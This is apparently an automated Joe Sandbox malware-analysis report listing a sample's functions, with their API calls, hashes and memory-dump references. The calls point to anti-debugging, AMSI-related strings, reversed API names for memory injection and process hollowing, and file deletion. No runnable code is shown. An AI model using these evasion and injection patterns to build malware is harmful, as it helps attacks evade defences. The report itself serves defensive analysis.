                                                                                                                  control_flow_graph 13222 2b2f744-2b2f75e GetModuleHandleW 13223 2b2f760-2b2f772 GetProcAddress 13222->13223 13224 2b2f78a-2b2f792 13222->13224 13223->13224 13225 2b2f774-2b2f784 CheckRemoteDebuggerPresent 13223->13225 13225->13224 13226 2b2f786 13225->13226 13226->13224
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
                                                                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                  • API String ID: 35162468-539270669
                                                                                                                  • Opcode ID: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
                                                                                                                  • Instruction ID: 362bd32dab411d132a2f7e16cf33f8bd7dadee8321ae1eea48ff71547cdee55a
                                                                                                                  • Opcode Fuzzy Hash: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
                                                                                                                  • Instruction Fuzzy Hash: B4F0A770904358BAEB11A6B888887ECFBB99B05328F6447D0A439625E1E7710648CA51
                                                                                                                  Function 02B2DD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
                                                                                                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
                                                                                                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
                                                                                                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25
                                                                                                                    • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1897104825-0
                                                                                                                  • Opcode ID: 8d8d07eb54bc25ced58ed9f6b0dac5f25f37d9d312c3b8a3eadc90b1fe71cdfb
                                                                                                                  • Instruction ID: cb33507f0371fe68966ae60c1350d619d561fbe3f02e67a5a19d6daea7cbe546
                                                                                                                  • Opcode Fuzzy Hash: 8d8d07eb54bc25ced58ed9f6b0dac5f25f37d9d312c3b8a3eadc90b1fe71cdfb
                                                                                                                  • Instruction Fuzzy Hash: F821E071A50319BAEB11EBD4CC56FDE77BDEB48700F5044A5B304F7180DA74AA048B64
                                                                                                                  Function 02B2E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                  • Opcode ID: 17ce24548237caae77c1116b07a1156187d5658262714ee2c4997fd7c8668167
                                                                                                                  • Instruction ID: a0088b32240204c0c93a2b628e941525b824f7999b1bb2216859d02b1e5a2f2c
                                                                                                                  • Opcode Fuzzy Hash: 17ce24548237caae77c1116b07a1156187d5658262714ee2c4997fd7c8668167
                                                                                                                  • Instruction Fuzzy Hash: 93413975B002189FEB01EBA4D881ADEB3BAEF88700FA044B6E145E7255DA70FD098F55
                                                                                                                  Function 02B2DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3764614163-0
                                                                                                                  • Opcode ID: 8a3affb8e9959c6c716f62f522eb69936d7eef8f503e3b6eceb66db42d09d5e5
                                                                                                                  • Instruction ID: f136d701f76cf2452534bb099dad970d2e84d65eb49685b700266cf4fc268102
                                                                                                                  • Opcode Fuzzy Hash: 8a3affb8e9959c6c716f62f522eb69936d7eef8f503e3b6eceb66db42d09d5e5
                                                                                                                  • Instruction Fuzzy Hash: 9321E071A40319BEEB10EBA0DD56FDEB7BDEB04B00F5144A1B604F71D0DBB4AA048A64
                                                                                                                  Function 02B28788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                  • API String ID: 3130163322-2353454454
                                                                                                                  • Opcode ID: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
                                                                                                                  • Instruction ID: b4156115f14dee8d39c35aa82bb7842d7eaaf1645aaf0c428994067ac26b9ea6
                                                                                                                  • Opcode Fuzzy Hash: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
                                                                                                                  • Instruction Fuzzy Hash: 9211E5B2654258AFEB40EFA8DD41F9A77EDEB0C740F5144A0FA08D7250C634FD159B25
                                                                                                                  Function 02B27A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                  • Opcode ID: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
                                                                                                                  • Instruction ID: d23e4f91fa0960da7e273cc3fe5a9162521a241682b36118c561ac0a532a118c
                                                                                                                  • Opcode Fuzzy Hash: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
                                                                                                                  • Instruction Fuzzy Hash: A1116DB5654308BFEB00EFA4DC41EAEB7FDEB49710F9084A0F904D7250DA30AA049B69
                                                                                                                  Function 02B27A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                  • Opcode ID: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
                                                                                                                  • Instruction ID: 8388146c6a95389dc2769de29c0f941351b9eb95c78c470c125d64e1f822c128
                                                                                                                  • Opcode Fuzzy Hash: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
                                                                                                                  • Instruction Fuzzy Hash: 9D116DB5654308BFEB00EFA4DC41E9EB7FDEB49710F9084A0F904D7250DA30AA049B69
                                                                                                                  Function 02B28400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                  • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                  • API String ID: 2521977463-737317276
                                                                                                                  • Opcode ID: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
                                                                                                                  • Instruction ID: 4416821152efddc7df5757196051053e39fe12a0bcaf38e925373375cc6836f0
                                                                                                                  • Opcode Fuzzy Hash: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
                                                                                                                  • Instruction Fuzzy Hash: 5E0140B5644318BFEB00EFA4DC41E9AB7FDEB4D700F9184A0F908D7650DA34A9159B64
                                                                                                                  Function 02B27D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                  • API String ID: 2719805696-3542721025
                                                                                                                  • Opcode ID: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
                                                                                                                  • Instruction ID: ddbd965f134c26a55d869f5fea77957af354fd61dad7dd9a68ceb4cbc746443f
                                                                                                                  • Opcode Fuzzy Hash: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
                                                                                                                  • Instruction Fuzzy Hash: 14012DB5654314AFDB00EFA8DC41E5AB7EDEB49700F908890B908D7650DA30AD159B75
                                                                                                                  Function 02B28670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                  • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                  • API String ID: 3503870465-2520021413
                                                                                                                  • Opcode ID: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
                                                                                                                  • Instruction ID: 49158d26d9311c15c17309da22fd1708ef641e0c56c2a26098a1afc479a9023a
                                                                                                                  • Opcode Fuzzy Hash: 1e3fff73664cdce6c7097bc5c563aeb72e88e0dfc9957bcc874732ce7c1ef189
                                                                                                                  • Instruction Fuzzy Hash: C201A2B4A44304AFEB00EFA4DC41E5EB7FEEB48740F9084E0F40497610DA34A905DA24
                                                                                                                  Function 02B2DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$DeleteFileNameName_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4284456518-0
                                                                                                                  • Opcode ID: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
                                                                                                                  • Instruction ID: 7e57c1e19183b966585c856fc1901b44e08328d363bdf6be433c6ecf41e8b3b6
                                                                                                                  • Opcode Fuzzy Hash: 61a08e4082b907a7fadada8ef99bea835fdc52f3085f566acc936c24da98cff4
                                                                                                                  • Instruction Fuzzy Hash: 4C01A275A4430A6EEB05DBA08D55FCD77B9AB44304F5005D29204E6081DAB4AB088B24
                                                                                                                  Function 02B2DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                  • RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                    • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
